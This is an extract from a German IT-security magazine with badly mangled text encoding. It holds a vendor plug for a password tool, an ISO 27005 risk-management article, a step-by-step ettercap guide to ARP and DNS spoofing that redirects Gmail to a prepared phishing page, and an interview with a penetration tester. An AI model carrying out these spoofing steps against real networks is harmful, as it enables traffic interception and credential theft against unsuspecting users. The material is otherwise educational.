seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen 